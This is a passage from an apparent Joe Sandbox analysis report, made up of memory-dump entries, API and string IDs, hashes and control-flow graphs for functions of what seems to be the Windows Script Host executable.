                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: ec99bbded9b97218ae828d37f134b296c31e44e973d5a4c897941c505b79f1be
                                                                                                                                                • Instruction ID: 774ec074d91091db9b1866e47961b4356f473eb2bc4d0f5e723a278375c56578
                                                                                                                                                • Opcode Fuzzy Hash: ec99bbded9b97218ae828d37f134b296c31e44e973d5a4c897941c505b79f1be
                                                                                                                                                • Instruction Fuzzy Hash: F3314433B186428AD705DF9AE85496CE3A1EB94BA4F908135DE4ECB754DF3CF8508790
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Window$Long$ErrorKillLastNtdllProc_Timer
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3207012407-0
                                                                                                                                                • Opcode ID: ce805b3e4bd65099b887d72d245e6461995e58dba14bbf82e0f3cbd5291331c6
                                                                                                                                                • Instruction ID: 83c591efa8c06cf1acf7adcb0e9f41820a2c94f140eedee0279f4a83251df95d
                                                                                                                                                • Opcode Fuzzy Hash: ce805b3e4bd65099b887d72d245e6461995e58dba14bbf82e0f3cbd5291331c6
                                                                                                                                                • Instruction Fuzzy Hash: 92017821A08B4582E614AF52AC40069B764FB99FE0B984031EF9A57BA5DF38E8528780
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CriticalDefaultInfoInitializeLangLocaleSectionUserVersion
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3795852257-0
                                                                                                                                                • Opcode ID: b6402d8bdc24367f0f7176ac030f8f89b9feb6f391a38c2ebaf239520a0f26d0
                                                                                                                                                • Instruction ID: 1523ec8913e5d301f8da0607c2558cacf1473dba76c3ae3b32f05201b3957415
                                                                                                                                                • Opcode Fuzzy Hash: b6402d8bdc24367f0f7176ac030f8f89b9feb6f391a38c2ebaf239520a0f26d0
                                                                                                                                                • Instruction Fuzzy Hash: 7A110A2191D653CAFA62EF50AC54379B290EB54329FC40536D18E81754CF3CB869DAB0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 253 7ff7c0b941a8-7ff7c0b941d6 CoInitialize 254 7ff7c0b94217-7ff7c0b94221 253->254 255 7ff7c0b941d8-7ff7c0b941e6 253->255 256 7ff7c0b94282-7ff7c0b942c4 GetCommandLineA MultiByteToWideChar call 7ff7c0ba3b74 254->256 257 7ff7c0b94223-7ff7c0b94233 GetCommandLineW 254->257 258 7ff7c0b941e8 FreeLibrary 255->258 259 7ff7c0b941ee-7ff7c0b941f8 255->259 269 7ff7c0b942c6-7ff7c0b942da MultiByteToWideChar 256->269 270 7ff7c0b94267-7ff7c0b9426c 256->270 262 7ff7c0b94244 257->262 263 7ff7c0b94235 257->263 258->259 260 7ff7c0b94200-7ff7c0b94212 RtlDeleteCriticalSection 259->260 261 7ff7c0b941fa FreeLibrary 259->261 265 7ff7c0b9440b-7ff7c0b94427 260->265 261->260 267 7ff7c0b94247-7ff7c0b94265 call 7ff7c0ba3b74 262->267 266 7ff7c0b94238-7ff7c0b94240 263->266 266->266 271 7ff7c0b94242 266->271 267->270 277 7ff7c0b94271-7ff7c0b94280 wcscpy_s 267->277 273 7ff7c0b942e0-7ff7c0b94309 call 7ff7c0ba07dc call 7ff7c0ba3b74 269->273 275 7ff7c0b943c2-7ff7c0b943d6 270->275 271->267 286 7ff7c0b94315-7ff7c0b9432a call 7ff7c0ba07dc 273->286 287 7ff7c0b9430b-7ff7c0b94310 273->287 281 7ff7c0b943d8 FreeLibrary 275->281 282 7ff7c0b943de-7ff7c0b943e8 275->282 277->273 281->282 284 7ff7c0b943f0-7ff7c0b94408 RtlDeleteCriticalSection 282->284 285 7ff7c0b943ea FreeLibrary 282->285 284->265 285->284 293 7ff7c0b943a2-7ff7c0b943a7 call 7ff7c0b940e4 286->293 294 7ff7c0b9432c-7ff7c0b94340 286->294 288 7ff7c0b943b7-7ff7c0b943bf call 7ff7c0ba3bb0 287->288 288->275 298 7ff7c0b943ac 293->298 294->293 295 7ff7c0b94342-7ff7c0b9435a call 7ff7c0ba08c0 294->295 302 7ff7c0b94365-7ff7c0b94379 call 7ff7c0ba08c0 295->302 303 7ff7c0b9435c call 7ff7c0b934d8 295->303 299 7ff7c0b943af-7ff7c0b943b2 call 7ff7c0ba3bb0 298->299 299->288 308 7ff7c0b94382-7ff7c0b94396 call 7ff7c0ba08c0 302->308 309 7ff7c0b9437b-7ff7c0b94380 call 7ff7c0b93c18 302->309 306 7ff7c0b94361-7ff7c0b94363 303->306 306->299 308->293 314 7ff7c0b94398-7ff7c0b943a0 call 7ff7c0b93268 308->314 309->306 314->306
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FreeLibrary$CriticalDeleteSectionwcscpy_s$CommandInitializeLine_malloc_dbg
                                                                                                                                                • String ID: embedding$regserver$unregserver
                                                                                                                                                • API String ID: 3628751982-3133065212
                                                                                                                                                • Opcode ID: 4ab481a69f424f93535b056e07248f5276efbb3594449536d994cc3ff8c7c98f
                                                                                                                                                • Instruction ID: 51ed036c316dd58f440a1f23cd94aef4ed1064badc968e016155b7465c81e05f
                                                                                                                                                • Opcode Fuzzy Hash: 4ab481a69f424f93535b056e07248f5276efbb3594449536d994cc3ff8c7c98f
                                                                                                                                                • Instruction Fuzzy Hash: DD616921A0D64381EA15FF62AD11579E2A0BF85BB0F804535ED1FC6BA1EF3CF46582A4
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 363 7ff7c0b95bfc-7ff7c0b95cc5 GetACP 364 7ff7c0b95d66-7ff7c0b95d76 call 7ff7c0ba3b74 363->364 365 7ff7c0b95ccb-7ff7c0b95ce6 LoadLibraryExW 363->365 373 7ff7c0b95d8f 364->373 374 7ff7c0b95d78-7ff7c0b95d8d 364->374 367 7ff7c0b95d06-7ff7c0b95d12 call 7ff7c0b9dddc 365->367 368 7ff7c0b95ce8-7ff7c0b95cfb GetProcAddress 365->368 378 7ff7c0b95d14-7ff7c0b95d43 call 7ff7c0ba3bd0 367->378 370 7ff7c0b95d44-7ff7c0b95d64 FreeLibrary 368->370 371 7ff7c0b95cfd-7ff7c0b95d00 FreeLibrary 368->371 370->364 370->367 371->367 377 7ff7c0b95d92-7ff7c0b95d95 373->377 374->377 379 7ff7c0b95db3-7ff7c0b95dc7 377->379 380 7ff7c0b95d97-7ff7c0b95dad CoRegisterMessageFilter 377->380 383 7ff7c0b95df5-7ff7c0b95e0b GetModuleFileNameA 379->383 384 7ff7c0b95dc9-7ff7c0b95de0 GetModuleFileNameW 379->384 380->379 382 7ff7c0b95daf 380->382 382->379 383->367 387 7ff7c0b95e11-7ff7c0b95e18 383->387 384->367 386 7ff7c0b95de6-7ff7c0b95dee 384->386 388 7ff7c0b95df0 386->388 389 7ff7c0b95e4c-7ff7c0b95e64 call 7ff7c0b955b4 386->389 387->367 390 7ff7c0b95e1e-7ff7c0b95e46 MultiByteToWideChar 387->390 388->367 393 7ff7c0b95e74-7ff7c0b95e7c call 7ff7c0b970b0 389->393 394 7ff7c0b95e66-7ff7c0b95e72 389->394 390->367 390->389 399 7ff7c0b95e95-7ff7c0b95ebb call 7ff7c0b9d258 393->399 400 7ff7c0b95e7e-7ff7c0b95e90 393->400 395 7ff7c0b95ecc-7ff7c0b95edb 394->395 395->367 404 7ff7c0b95ee0-7ff7c0b95ef8 call 7ff7c0b9d258 399->404 405 7ff7c0b95ebd 399->405 400->367 404->405 409 7ff7c0b95efa-7ff7c0b95f14 call 7ff7c0b9dbec 404->409 406 7ff7c0b95ec3-7ff7c0b95ec9 405->406 406->395 412 7ff7c0b95f16-7ff7c0b95f1b 409->412 413 7ff7c0b95f29-7ff7c0b95f61 409->413 412->367 414 7ff7c0b95f21-7ff7c0b95f27 412->414 415 7ff7c0b95f73-7ff7c0b95f89 413->415 416 7ff7c0b95f63-7ff7c0b95f70 413->416 414->406 417 7ff7c0b95fc4-7ff7c0b95fcb 415->417 418 7ff7c0b95f8b-7ff7c0b95f8d 415->418 416->415 419 7ff7c0b95fdd-7ff7c0b95fe4 417->419 420 7ff7c0b95fcd-7ff7c0b95fd3 417->420 421 7ff7c0b95f8f-7ff7c0b95f9a 418->421 422 7ff7c0b95fbc-7ff7c0b95fbf 418->422 423 7ff7c0b95fea-7ff7c0b96026 GetACP call 7ff7c0b9d30c 419->423 424 7ff7c0b9606b-7ff7c0b96075 419->424 420->419 425 7ff7c0b95fac-7ff7c0b95fb2 421->425 426 7ff7c0b95f9c-7ff7c0b95fa2 421->426 422->367 437 7ff7c0b96032-7ff7c0b9603a 423->437 438 7ff7c0b96028-7ff7c0b9602d call 7ff7c0b95a34 423->438 428 7ff7c0b960a2-7ff7c0b960a9 424->428 429 7ff7c0b96077-7ff7c0b9608b call 7ff7c0b9d30c 424->429 425->422 426->425 432 7ff7c0b960ab-7ff7c0b960b8 call 7ff7c0b95a34 428->432 433 7ff7c0b9610d-7ff7c0b96114 428->433 440 7ff7c0b9603c-7ff7c0b9604f 429->440 441 7ff7c0b9608d-7ff7c0b9609f 429->441 449 7ff7c0b960ba-7ff7c0b960c9 432->449 450 7ff7c0b960cb-7ff7c0b960d2 432->450 435 7ff7c0b9611f-7ff7c0b96127 433->435 436 7ff7c0b96116-7ff7c0b96118 433->436 442 7ff7c0b96129-7ff7c0b96135 435->442 444 7ff7c0b96159-7ff7c0b96161 435->444 436->442 443 7ff7c0b9611a 436->443 437->440 447 7ff7c0b96054-7ff7c0b96066 437->447 438->437 451 7ff7c0b96142-7ff7c0b96154 440->451 441->428 448 7ff7c0b96138-7ff7c0b9613e 442->448 443->435 452 7ff7c0b961e1-7ff7c0b961e6 444->452 453 7ff7c0b96163-7ff7c0b96198 call 7ff7c0b94654 444->453 447->422 448->451 449->448 457 7ff7c0b960d4-7ff7c0b960db 450->457 458 7ff7c0b9610a 450->458 451->367 455 7ff7c0b9627c-7ff7c0b9628d call 7ff7c0b9dddc 452->455 456 7ff7c0b961ec-7ff7c0b96239 call 7ff7c0b94654 452->456 466 7ff7c0b9619d-7ff7c0b961a2 453->466 455->378 474 7ff7c0b9626a-7ff7c0b96276 456->474 475 7ff7c0b9623b-7ff7c0b9623e 456->475 464 7ff7c0b960f2 457->464 465 7ff7c0b960dd-7ff7c0b960e4 457->465 458->433 471 7ff7c0b960f8-7ff7c0b96100 464->471 465->367 470 7ff7c0b960ea-7ff7c0b960f0 465->470 466->455 467 7ff7c0b961a8-7ff7c0b961ac 466->467 472 7ff7c0b961b1-7ff7c0b961b8 467->472 473 7ff7c0b961ae 467->473 470->471 471->458 472->455 476 7ff7c0b961be-7ff7c0b961dc 472->476 473->472 474->455 474->456 477 7ff7c0b96240 475->477 478 7ff7c0b96243-7ff7c0b9624a 475->478 476->455 477->478 478->474 479 7ff7c0b9624c-7ff7c0b96261 478->479 479->474
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Library$Free$AddressFileFilterLoadMessageModuleNameProcRegister
                                                                                                                                                • String ID: HeapSetInformation$W$kernel32.dll
                                                                                                                                                • API String ID: 2721285356-3363034650
                                                                                                                                                • Opcode ID: 0e5f7894d6b3d09ce34e09711cc341d99b6aa25c41325597481ea016ab6934ef
                                                                                                                                                • Instruction ID: c75a8674c2e052ef7e9a89d39c30e2b9ca9ea6edb7e7993d34b6ce43b3dbe143
                                                                                                                                                • Opcode Fuzzy Hash: 0e5f7894d6b3d09ce34e09711cc341d99b6aa25c41325597481ea016ab6934ef
                                                                                                                                                • Instruction Fuzzy Hash: 8F029532A086C286EB21DF25DD406E9B7B4EF45B98F844035CA4E87B55DF39F621C7A0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 481 7ff7c0b94428-7ff7c0b94463 482 7ff7c0b94490-7ff7c0b9449b 481->482 483 7ff7c0b94465-7ff7c0b94475 SysAllocString 481->483 486 7ff7c0b94501-7ff7c0b94521 MultiByteToWideChar 482->486 487 7ff7c0b9449d-7ff7c0b944b2 GetVersionExA 482->487 484 7ff7c0b94481-7ff7c0b9448b 483->484 485 7ff7c0b94477-7ff7c0b9447c 483->485 490 7ff7c0b9461d-7ff7c0b94642 call 7ff7c0ba3bd0 484->490 485->490 488 7ff7c0b94562 486->488 489 7ff7c0b94523-7ff7c0b94537 GetLastError 486->489 491 7ff7c0b944b8-7ff7c0b944bc 487->491 492 7ff7c0b9453c-7ff7c0b9453f 487->492 497 7ff7c0b94565-7ff7c0b94576 SysAllocStringLen 488->497 489->490 491->492 495 7ff7c0b944be-7ff7c0b944de IsTextUnicode 491->495 493 7ff7c0b94541-7ff7c0b94545 492->493 494 7ff7c0b94549-7ff7c0b9454c 492->494 493->486 498 7ff7c0b94547 493->498 494->486 499 7ff7c0b9454e-7ff7c0b94552 494->499 495->486 500 7ff7c0b944e0-7ff7c0b944e2 495->500 497->485 502 7ff7c0b9457c-7ff7c0b9457e 497->502 503 7ff7c0b944e8-7ff7c0b944ea 498->503 499->486 504 7ff7c0b94554-7ff7c0b94557 499->504 500->504 505 7ff7c0b944e4-7ff7c0b944e6 500->505 506 7ff7c0b94580-7ff7c0b945a0 MultiByteToWideChar 502->506 507 7ff7c0b945b8-7ff7c0b945bb 502->507 503->504 510 7ff7c0b9455a-7ff7c0b94560 504->510 505->503 511 7ff7c0b944ec-7ff7c0b944ee 505->511 512 7ff7c0b945a2-7ff7c0b945b6 GetLastError 506->512 513 7ff7c0b945ee-7ff7c0b945fb 506->513 508 7ff7c0b945cf-7ff7c0b945db memcpy 507->508 509 7ff7c0b945bd-7ff7c0b945cd _swab 507->509 515 7ff7c0b945e1-7ff7c0b945ec 508->515 509->515 510->497 511->510 518 7ff7c0b944f0-7ff7c0b944f2 511->518 514 7ff7c0b9460f-7ff7c0b94612 512->514 516 7ff7c0b94606-7ff7c0b9460c 513->516 517 7ff7c0b945fd-7ff7c0b94602 513->517 514->490 519 7ff7c0b94614-7ff7c0b94617 SysFreeString 514->519 515->513 515->516 516->514 517->516 520 7ff7c0b944f4-7ff7c0b944f6 518->520 521 7ff7c0b944f8-7ff7c0b944fb 518->521 519->490 520->510 521->510 522 7ff7c0b944fd-7ff7c0b944ff 521->522 522->486 522->520
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: String$Alloc$ByteCharErrorFreeLastMultiTextUnicodeVersionWide
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1844124450-0
                                                                                                                                                • Opcode ID: afe976a9d5503695198e612cc8e9e105db2e460a831b35614bac886ece7dfef1
                                                                                                                                                • Instruction ID: 8cea781942259fec0e86c6f1b4fa74614db19e1903564153d51ccb55ffe1935a
                                                                                                                                                • Opcode Fuzzy Hash: afe976a9d5503695198e612cc8e9e105db2e460a831b35614bac886ece7dfef1
                                                                                                                                                • Instruction Fuzzy Hash: 68519265A0874247FA61EF55AD00A39E2A0BF657B4F914234CE5BC7B90DF3CB81586A0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ClassEventMessage$CreateDispatchErrorInfoLastRegisterWindow
                                                                                                                                                • String ID: WSH-Timer
                                                                                                                                                • API String ID: 2425405920-2323048385
                                                                                                                                                • Opcode ID: 3a91365441e18503799be1ea7b991465d2dd856b64461b16883ca5379667b303
                                                                                                                                                • Instruction ID: 5abafc81203f549198b2ebd7aa74dfea4b62b7ea313d0dfed4b3246b2e03dbf4
                                                                                                                                                • Opcode Fuzzy Hash: 3a91365441e18503799be1ea7b991465d2dd856b64461b16883ca5379667b303
                                                                                                                                                • Instruction Fuzzy Hash: 92315232A18B42DAD750DF65EC80669B3B0FB487A4F905136DA4E83F54DF38E564C7A0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressLibraryProc$ErrorFreeLastLoad
                                                                                                                                                • String ID: WLDP.DLL$WldpGetLockdownPolicy$WldpIsClassInApprovedList
                                                                                                                                                • API String ID: 1004692917-3104440107
                                                                                                                                                • Opcode ID: d0c7597ecaa580b8324df83a41a0d49710e2127081c38c1a8e0b6c62d99b8303
                                                                                                                                                • Instruction ID: 3bc87a872b11351589a038b7e4666dfe58fb38bbbfdf6b9476598dfa40db8861
                                                                                                                                                • Opcode Fuzzy Hash: d0c7597ecaa580b8324df83a41a0d49710e2127081c38c1a8e0b6c62d99b8303
                                                                                                                                                • Instruction Fuzzy Hash: D2217131A08B4282E715EF26E94027AB2A4FB487A0F844135DE8F86B94DF3CE555C7A4
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Close$OpenQueryValue
                                                                                                                                                • String ID: IgnoreUserSettings$Software\Microsoft\Windows Script Host\Settings$TrustPolicy$UseWINSAFER
                                                                                                                                                • API String ID: 1607946009-2293819020
                                                                                                                                                • Opcode ID: 8563d692243e40ef3ece6761c209279db69629fbdca1044d1ad62409f400f529
                                                                                                                                                • Instruction ID: 20cf04b0d67d2934ebf38e52e09cdc7d26c8debce5de2ca3afdee365ad27a0c5
                                                                                                                                                • Opcode Fuzzy Hash: 8563d692243e40ef3ece6761c209279db69629fbdca1044d1ad62409f400f529
                                                                                                                                                • Instruction Fuzzy Hash: 5F41A062A0561299EB51EF75DC803F8A7E0AF007A4FC40532E90F96B99DF3CE585C3A0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • SysAllocString.OLEAUT32 ref: 00007FF7C0B9473F
                                                                                                                                                  • Part of subcall function 00007FF7C0B9AE8C: GetCurrentThreadId.KERNEL32 ref: 00007FF7C0B9AECF
                                                                                                                                                • SysAllocString.OLEAUT32 ref: 00007FF7C0B94760
                                                                                                                                                  • Part of subcall function 00007FF7C0B94F18: UnmapViewOfFile.KERNEL32 ref: 00007FF7C0B94F9F
                                                                                                                                                  • Part of subcall function 00007FF7C0B94F18: FindCloseChangeNotification.KERNELBASE ref: 00007FF7C0B94FAF
                                                                                                                                                  • Part of subcall function 00007FF7C0B94F18: CloseHandle.KERNEL32 ref: 00007FF7C0B94FBE
                                                                                                                                                  • Part of subcall function 00007FF7C0B962B0: LoadLibraryW.KERNELBASE(?,?,?,?,?,?,?,00007FF7C0B947E9), ref: 00007FF7C0B962D7
                                                                                                                                                  • Part of subcall function 00007FF7C0B962B0: GetLastError.KERNEL32(?,?,?,?,?,?,?,00007FF7C0B947E9), ref: 00007FF7C0B962E5
                                                                                                                                                  • Part of subcall function 00007FF7C0B962B0: FreeLibrary.KERNEL32(?,?,?,?,?,?,?,00007FF7C0B947E9), ref: 00007FF7C0B963AC
                                                                                                                                                • FindCloseChangeNotification.KERNELBASE ref: 00007FF7C0B947EE
                                                                                                                                                  • Part of subcall function 00007FF7C0B96B8C: LoadLibraryExW.KERNEL32(?,?,?,?,?,00007FF7C0B948A9), ref: 00007FF7C0B96BD0
                                                                                                                                                  • Part of subcall function 00007FF7C0B96B8C: GetLastError.KERNEL32(?,?,?,?,?,00007FF7C0B948A9), ref: 00007FF7C0B96BE9
                                                                                                                                                • SysFreeString.OLEAUT32 ref: 00007FF7C0B9498B
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseLibraryString$AllocChangeErrorFindFreeLastLoadNotification$CurrentFileHandleThreadUnmapView
                                                                                                                                                • String ID: .wsf
                                                                                                                                                • API String ID: 668663949-2429851548
                                                                                                                                                • Opcode ID: 6f3682eb65fe35bb060f5c697f860dff5e035ef5d185db1939380b89302bb8c6
                                                                                                                                                • Instruction ID: 6db4677ccf1a99b2fe6409c4d6cbc91a926ea1855514b4f61223b579b76b6088
                                                                                                                                                • Opcode Fuzzy Hash: 6f3682eb65fe35bb060f5c697f860dff5e035ef5d185db1939380b89302bb8c6
                                                                                                                                                • Instruction Fuzzy Hash: 35918F21B08B9286EA55EF669C8067AE3A0AF45BE4F804135DE0FC7795DF3DF41183A0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AllocString$LoadType_malloc_dbgmemcpy
                                                                                                                                                • String ID: .
                                                                                                                                                • API String ID: 1856389451-248832578
                                                                                                                                                • Opcode ID: 9e24f8ce75da09a248b20cc0b8c071a973126f9becfa49865a23222ceeaed76d
                                                                                                                                                • Instruction ID: d58e61cad26d48297cb7011e9c8ba1af23e7340f5757ee80f97252193184e9c0
